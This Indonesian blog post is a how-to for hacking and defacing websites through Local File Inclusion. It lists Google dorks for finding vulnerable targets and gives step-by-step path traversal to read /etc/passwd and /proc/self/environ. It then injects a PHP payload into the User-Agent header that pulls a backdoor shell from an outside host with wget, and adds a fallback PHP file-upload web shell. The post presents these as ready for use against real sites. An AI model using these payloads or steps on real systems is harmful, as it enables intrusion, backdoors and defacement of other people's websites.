Deface Metode Local File Inclusion

Assalamualaikum wr wb
Cara Meretas Website Dengan Teknik Local File Inclusion(LFI)
________________________________
Teknik Ini Cukup Sederhana Dan Basicnya mirip Seperti Sql Injection,Sebenarnya Teknik Ini Sudah Cukup lama.tapi baru ane Post Hari Ini Soalnya Susah Nyari Tergetny(mungkin ane yg kurang pro nge dorking;v) Konsepnya adalah meracuni Http headernya dengan uploader kalian lalu kalian bisa upload shell backdor
ciri ciri web yg vuln dengan metode ini yaitu ada ekstensi php setelah Sama dengan(=)
    contoh http://nekopoi.care/file=kimak.php
    nah begitu kira kira ciri ciri vulnnya slur:v
=================================
Alat Dan Bahan:v
-Shell Backdor
-Tamper Data(Bisa pake Mozilla atau Anon Hackbar)
-Script Uploadernya:D
-Kesabaran:v
==================================
Google Dork: inurl:/view/lang/index.php?page=?page=
             inurl:/shared/help.php?page=
             inurl:index.php?file= site:com"
             (Kembangin lagi Dorknya;v)
==================================
Script Uploadernya:
<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>
==================================
Proof Of Concept:
1.Dorking Di Google Dan Pilih Web yg vuln
  ingat Contoh web vuln LFI selalu ada ekstensi Php di belakanganya:v
2.Tambahkan ../../../ Di belakang Url
  contoh https://site.com/?file=../../../
  lalu enter jika blank mungkin saja vuln saya juga kurang tau hehe
3.sekarang kita iseng iseng ganti dengan /etc/passwd
  contoh https://site.com/?file=/etc/passwd
  tapi masih kosong belum muncul apapun sekarang kita coba naikan direktorinya seperti ini
   https://site.com/?file=../etc/passwd > Kosong
   https://site.com/?file=../../etc/passwd > kosong
   https://site.com/?file=../../../etc/passwd > kosong
   https://site.com/?file=../../../../etc/passwd > kosong
   https://site.com/?file=../../../../../etc/passwd > nemu
   catatan:kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya ketemu.

4.nah saya nemu bugnya di direktori seperti ini https://site.com/?file=../../../../../etc/passwd
  sekarang ke proc/self/environ kira kira bisa di akses tidak karena di sini kita akan mulai main backdor
  ganti /etc/passwd dengan /proc/slelf/environ
  https://site.com/?file=../../../../../proc/self/environ

  nah kalo engga blank/kosong berarti bisa hehe
5.Selanjutnya Racuni Http Headernya Dengan malicious code
  aktifkan tamper data.
  load halaman https://site.com/?file=../../../../../proc/self/environ
  Lalu tamper.
  pada user-agent di isi dengan
  <?system(‘wget http://shellkalian.com/shell.txt -O shell.php’);?>
  Lalu submit jika berhasil shell kalian terletak di
  http://site.com/shell.php

catatan:di beberapa kasus fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget seperti cara di atas
        jika itu terjadi coba cara berikut
        pada user-agent masukkan script uploader ini :
       <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> <h1> shu </h1></p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
       Setelah diupload, maka shell akan terletak di root path domain.

oke sekian semoga bermanfaat
wassalamualaikum wr wb

Artikel Terkait

Belum ada Komentar untuk "Deface Metode Local File Inclusion"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel